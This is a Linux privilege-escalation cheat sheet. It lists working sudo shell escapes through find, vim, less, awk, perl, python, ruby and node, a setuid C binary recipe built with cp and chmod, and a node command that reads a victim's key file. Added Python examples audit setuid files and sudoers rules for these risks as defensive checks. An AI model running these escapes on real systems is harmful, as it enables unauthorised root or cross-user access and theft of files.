Privilege Escalations
Using find's -exec parameter
sudo -u <user-that-can-run-find> find / -name example -exec /bin/bash \;
Using vim
sudo -u <user-that-can-run-vim> vim
Then run :!/bin/bash inside vim to get a shell.
Using less
sudo -u <user-that-can-run-less> less
Then run :!/bin/bash inside less to get a shell.
Using awk
sudo -u <user-that-can-run-awk> awk 'BEGIN {system("/bin/bash")}'
Using setuid or setgid (chmod and cp)
- Write a C program like the one below:
#include <stdlib.h>
int main(void)
{
    system("cat /usr/home/file.txt");
    return 0;
}
- Compile it using gcc -o foo foo.c
- Since cp can be run, use sudo -u <user-that-can-run-cp> cp foo /tmp/foo1
- After copying, the owner of the file foo1 becomes <user-that-can-run-cp>.
- Change the file permissions using sudo -u <user-that-can-run-chmod> chmod +xs foo1
- Run the file using ./foo1
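A defender's check for the outcome of the steps above: a setuid or setgid executable that appears outside the system binary directories, is owned by a non-root account, or is writable by others. This is an added example, not part of the original page; it builds a scratch directory containing a constructed setuid file so that it runs offline, and the trusted-directory list and the heuristics in suspicious() are this example's own assumptions.

```python
import os
import stat
import tempfile
from collections import namedtuple

SetidFile = namedtuple("SetidFile", "path mode uid gid setuid setgid")


def find_setid_files(root):
    """Walk `root` and return every regular file with the setuid or setgid bit set."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            suid = bool(st.st_mode & stat.S_ISUID)
            sgid = bool(st.st_mode & stat.S_ISGID)
            if suid or sgid:
                hits.append(SetidFile(path, stat.S_IMODE(st.st_mode),
                                      st.st_uid, st.st_gid, suid, sgid))
    return hits


# Assumed policy: set-id files are expected only here and only owned by root.
TRUSTED_PREFIXES = ("/usr/bin/", "/usr/sbin/", "/bin/", "/sbin/", "/usr/lib/", "/usr/libexec/")
TRUSTED_UIDS = (0,)


def suspicious(hit):
    """Return the list of reasons a set-id file deserves a closer look (empty if none)."""
    reasons = []
    if hit.uid not in TRUSTED_UIDS:
        reasons.append("owned by uid %d rather than a trusted account" % hit.uid)
    if not hit.path.startswith(TRUSTED_PREFIXES):
        reasons.append("outside the usual system binary directories")
    if hit.mode & (stat.S_IWGRP | stat.S_IWOTH):
        reasons.append("group- or world-writable")
    return reasons


def build_demo_tree():
    """Constructed sample: a scratch directory with one setuid file and one ordinary file."""
    root = tempfile.mkdtemp(prefix="setid-demo-")
    suid_path = os.path.join(root, "foo1")
    plain_path = os.path.join(root, "plain")
    for p in (suid_path, plain_path):
        with open(p, "w") as f:
            f.write("#!/bin/sh\necho demo\n")
    os.chmod(suid_path, 0o4755)  # rwsr-xr-x, the shape produced by chmod +xs
    os.chmod(plain_path, 0o755)
    return root


def demo():
    """Scan the constructed tree and return (name, is_setuid, reasons) per hit."""
    root = build_demo_tree()
    return [(os.path.basename(h.path), h.setuid, suspicious(h))
            for h in find_setid_files(root)]


if __name__ == "__main__":
    for name, is_suid, reasons in demo():
        print(name, "setuid" if is_suid else "setgid", "; ".join(reasons))
```

Run against a real root (for example find_setid_files("/")) the scan must be done as a user that can read the directories in question, and every hit with a non-empty reason list should be compared with the package manager's record of which set-id files are expected.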
Using perl
sudo -u <user-that-can-run-perl> perl -e '`/bin/bash`'
Use single quotes only, not double quotes: inside double quotes the calling shell would expand the backticks itself before perl ever runs.
Using python
sudo -u <user-that-can-run-python> python
>>> from subprocess import call
>>> call(['/bin/bash'])
- A shell for <user-that-can-run-python> is attained.
Using ruby
sudo -u <user-that-can-run-ruby> /usr/bin/ruby -e 'require "irb" ; IRB.start(__FILE__)'
- This will open an interactive ruby environment (irb(main):001:0>). Now type `/bin/bash`
Using node
node -e 'var exec = require("child_process").exec; exec("[COMMAND]", function (error, stdOut, stdErr) { console.log(stdOut); });'
where [COMMAND] is the command that needs to be executed. For example:
sudo -u victim node -e 'var exec = require("child_process").exec; exec("cat /home/victim/key.txt", function (error, stdOut, stdErr) { console.log(stdOut); });'
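Every section on this page depends on one thing: a sudoers rule that lets an account run one of these binaries as another user. The following added example, which is not from the original page, audits sudoers-style text for exactly those rules and reports each one with the run-as user and whether the arguments are left unrestricted. It parses only the common `user host=(runas) [TAG:] cmd, cmd` form, which is an assumption about the input rather than the full sudoers grammar; the binary list is the set of programs this page covers, and the sample sudoers content is constructed.

```python
import os
import re
from collections import namedtuple

# Binaries this page shows being used for a shell escape or privileged file
# access once they can be run via sudo as another user.
SHELL_ESCAPE_BINARIES = {
    "find", "vim", "less", "awk", "perl", "python", "ruby", "node", "cp", "chmod",
}

Finding = namedtuple("Finding", "line_no user runas command reason")

# Common sudoers user-specification form (a subset of the real grammar, an
# assumption for this example):  user  host = (runas[:group])  [TAG:] cmd1, cmd2
_SPEC_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<cmds>.+)$"
)
_TAG_RE = re.compile(
    r"^(?:NOPASSWD|PASSWD|SETENV|NOSETENV|NOEXEC|EXEC|MAIL|NOMAIL|"
    r"FOLLOW|NOFOLLOW|LOG_INPUT|NOLOG_INPUT|LOG_OUTPUT|NOLOG_OUTPUT):\s*"
)
_SKIP_PREFIXES = ("Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias", "Runas_Alias")


def _strip_tags(cmd):
    """Remove leading tags such as NOPASSWD: or NOPASSWD:SETENV: from a command entry."""
    while True:
        stripped = _TAG_RE.sub("", cmd)
        if stripped == cmd:
            return cmd
        cmd = stripped


def audit_sudoers(text):
    """Return a Finding for every rule granting ALL or a shell-escape-capable binary."""
    findings = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line or line.startswith(_SKIP_PREFIXES):
            continue
        m = _SPEC_RE.match(line)
        if not m:
            continue
        user = m.group("user")
        runas = (m.group("runas") or "root").split(":")[0].strip() or "root"
        for entry in m.group("cmds").split(","):
            cmd = _strip_tags(entry.strip())
            if not cmd or cmd.startswith("!"):
                continue  # empty entry or an explicit denial
            if cmd == "ALL":
                findings.append(Finding(line_no, user, runas, cmd, "ALL permits any command"))
                continue
            exe, _, args = cmd.partition(" ")
            base = os.path.basename(exe)
            stem = re.sub(r"[\d.]+$", "", base)  # python3.11 -> python
            if base in SHELL_ESCAPE_BINARIES or stem in SHELL_ESCAPE_BINARIES:
                reason = "%s can spawn a shell or read/write files as %s" % (stem, runas)
                if not args.strip():
                    reason += "; arguments are unrestricted"
                findings.append(Finding(line_no, user, runas, cmd, reason))
    return findings


# Constructed sample sudoers content for the demonstration, not from any real host.
SAMPLE_SUDOERS = """\
Defaults env_reset
%admin  ALL=(ALL) ALL
alice   ALL=(victim) NOPASSWD: /usr/bin/vim, /usr/bin/find
bob     ALL=(root) /usr/bin/python3 /opt/app/backup.py
carol   ALL=(ALL:ALL) NOPASSWD:SETENV: /bin/cp, /bin/chmod
dave    ALL=(root) /usr/bin/systemctl restart nginx   # not a shell-escape binary
"""

if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print("line %d: %s -> (%s) %s: %s" % (f.line_no, f.user, f.runas, f.command, f.reason))
```

A rule with fixed arguments (bob's python3 invocation of one script) is reported with a weaker reason than one with none, because sudo then restricts the command line; the remaining risk is whether the script or its interpreter path is writable, which this check does not cover. On a live host the same function can be run over the output of sudo -l for each account, since that output uses the same command-list form.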